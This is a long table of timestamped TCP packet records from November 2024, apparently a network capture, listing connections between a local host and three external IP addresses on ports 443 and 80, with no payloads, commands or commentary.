                                                                                                Nov 11, 2024 10:03:23.295196056 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295269966 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295289993 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295303106 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295310974 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295326948 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295341969 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295347929 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295372009 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295464039 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437627077 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437638998 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437688112 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437702894 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437710047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437725067 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437724113 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437834978 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437834978 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437846899 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439260006 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439362049 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.439380884 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439594030 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439659119 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.439667940 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.440869093 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581073046 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581123114 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581166029 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581192970 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581204891 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581373930 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.722985983 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723033905 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723068953 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.723093033 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723108053 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.746049881 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.864645958 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864698887 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864728928 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.864758968 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864778042 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.865514994 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865565062 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865578890 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.865587950 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865622997 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.887547970 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.006975889 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007034063 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007038116 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007057905 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007085085 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007935047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007985115 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007986069 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007998943 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.008035898 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.041462898 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152064085 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152116060 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152152061 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152174950 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152188063 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152471066 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152517080 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152518034 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152529955 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152564049 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.153547049 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153592110 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153601885 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.153611898 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153644085 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.174336910 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.292169094 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292222023 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292247057 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.292256117 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292268991 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293030977 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293076992 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293081045 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293091059 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293128967 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293811083 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293853998 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293859005 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293864965 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293903112 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.419351101 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.434429884 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434484959 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434521914 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.434550047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434568882 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435102940 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435142040 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435149908 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435162067 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435194969 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435909986 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435961962 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435975075 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.647322893 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.647371054 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.664539099 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.894325972 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.894393921 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.894474030 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072129965 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072173119 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:25.072218895 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072227001 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:04:28.680280924 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.685122967 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:28.685197115 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.693653107 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.698508024 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.496959925 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.696645975 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.696790934 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:29.698112011 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:29.702980995 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.485723019 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.490668058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.490755081 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.490911961 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.495837927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973723888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973752975 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973773003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973789930 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973793983 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973810911 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973814964 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973825932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973843098 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973853111 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973870993 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973880053 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.974466085 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974478006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974489927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974513054 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.974526882 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981012106 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981056929 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981101036 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981113911 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981137991 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981151104 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.996376991 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054717064 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054728985 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054789066 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054836988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054851055 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054862976 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054876089 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054876089 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054889917 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054913044 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055480003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055496931 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055499077 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055531979 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219674110 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219686031 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222093105 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222141027 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222661972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222700119 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222711086 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222718954 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222739935 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222770929 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222780943 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222791910 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222821951 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222834110 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222872972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222882986 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222893953 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222904921 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222917080 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222919941 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222932100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222934008 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222942114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222954035 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222966909 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223001003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223017931 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223030090 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223042965 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223043919 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223062038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223117113 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223118067 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223129988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223162889 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223176003 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223256111 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223304987 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223356962 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223377943 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223388910 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223398924 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223411083 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223412037 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223419905 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223423958 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223436117 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223442078 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223449945 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223460913 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223479033 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223794937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223807096 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223824024 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223835945 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223855019 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223923922 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264343023 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264355898 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264384031 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264394999 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264406919 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264431953 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264621973 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264636040 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264642000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264648914 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264738083 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264753103 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264780998 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264780998 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264811039 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298209906 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298222065 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298249006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298260927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298270941 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298278093 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298286915 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298295021 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298299074 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298312902 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298331976 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298343897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298353910 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298353910 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298356056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298369884 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298393011 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298506021 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298517942 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298530102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298541069 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298546076 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298557043 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298572063 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298574924 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298593044 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298604012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298608065 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298615932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298628092 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298640013 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298641920 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298652887 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298659086 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298671961 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298683882 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298712969 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298758984 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298852921 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298863888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298875093 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298906088 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298913002 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298913002 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298918009 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298929930 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298943043 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298943043 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298955917 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298964977 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298986912 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299031019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299050093 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299067020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299081087 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299081087 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299094915 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299112082 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299133062 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299145937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299156904 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299170017 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299173117 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299181938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299205065 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299212933 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299387932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299398899 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299411058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299422979 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299432039 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299433947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299446106 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299453020 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299458027 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299469948 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299474001 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299487114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299487114 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299499035 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299510956 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299513102 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299520969 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299523115 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299535036 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299539089 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299547911 CET804916345.33.6.223192.168.2.22
